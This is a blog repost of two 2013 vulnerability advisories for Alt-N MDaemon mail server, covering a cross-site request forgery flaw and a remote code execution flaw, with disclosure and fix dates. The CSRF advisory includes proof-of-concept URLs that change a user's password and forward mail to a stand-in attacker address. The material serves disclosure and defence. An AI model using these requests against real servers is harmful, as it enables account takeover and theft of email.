Showing posts with label WebAdmin. Show all posts
Showing posts with label WebAdmin. Show all posts

Thursday, February 21, 2013

Alt-N MDaemon's WorldClient & WebAdmin Cross-Site Request Forgery Vulnerability

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   Alt-N MDaemon's WorldClient & WebAdmin Cross-Site Request Forgery
Vulnerability
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Software:  Alt-N MDaemon v13.0.3 and prior versions
Vendor: http://www.altn.com/


Vuln Type: Cross-Site Request Forgery
Remote: Yes
Local: No
Discovered by: QSecure and Demetris Papapetrou
References: http://www.qsecure.com.cy/advisories/Alt-N_MDaemon_WorldClient_and_WebAdmin_CSRF.html
 

Discovered: 25/07/2012
Reported: 19/12/2012
Fixed: 15/01/2013 (http://files.altn.com/MDaemon/Release/RelNotes_en.html
)
Disclosed: 18/02/2013

VULNERABILITY DESCRIPTION:
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Alt-N WorldClient and WebAdmin applications are prone to a cross-site
request-forgery vulnerability. It should be noted that partial
protection is provided by the Session parameter, but this alone cannot
be considered as an adequate protection mechanism.

An attacker can exploit this issue to perform different actions on the
affected application without the user's consent. For example, the
attacker can change the user's password, forward a copy of the user's
emails to a different email account, retrieve his/her address book,
send email messages to other users/email addresses and/or perform
other similar tasks.

Alt-N MDaemon v13.0.3 & v12.5.6 were tested and found vulnerable;
other versions may also be affected.

PoC Exploit:
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Change Password:
http://www.example.com:3000/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&Password=Letme1n&ConfirmPassword=Letme1n


Enable Forwarding:
http://www.example.com:3000/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&ForwardingEnabled=Yes&ForwardingRetainCopy=Yes&ForwardingAddress=evil%40example.com





Courtesy: securityfocus.com

Alt-N MDaemon's WebAdmin Remote Code Execution Vulnerability

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   Alt-N MDaemon's WebAdmin Remote Code Execution Vulnerability
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Software:  Alt-N MDaemon v13.0.3 and prior versions
Vendor: http://www.altn.com/


Vuln Type: Remote Code Execution
Remote: Yes
Local: No
Discovered by: QSecure and Demetris Papapetrou
References: http://www.qsecure.com.cy/advisories/Alt-N_MDaemon_WebAdmin_Remote_Code_Execution.html
 

Discovered: 01/10/2012
Reported: 19/12/2012
Fixed: 15/01/2013 (http://files.altn.com/MDaemon/Release/RelNotes_en.html
)
Disclosed: 18/02/2013

VULNERABILITY DESCRIPTION:
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Alt-N WebAdmin application is prone to a remote code execution
vulnerability via the user account import facility. Attackers may
utilize a compromised user/non-admin account to create new accounts in
the system or modify existing ones, in a way that will turn-on the
autorespond "program processing" functionality and cause it to execute
arbitrary commands on the underlying operating system.

Furthermore, utilizing the user account import facility, an ordinary
user can change the password of any other user or administrator
account within MDaemon and access his/her emails. However, a
side-effect of this procedure is that any administrator accounts that
get modified this way, are downgraded to ordinary users.

Alt-N MDaemon v13.0.3 & v12.5.6 were tested and found vulnerable;
other versions may also be affected.






Courtesy: securityfocus.com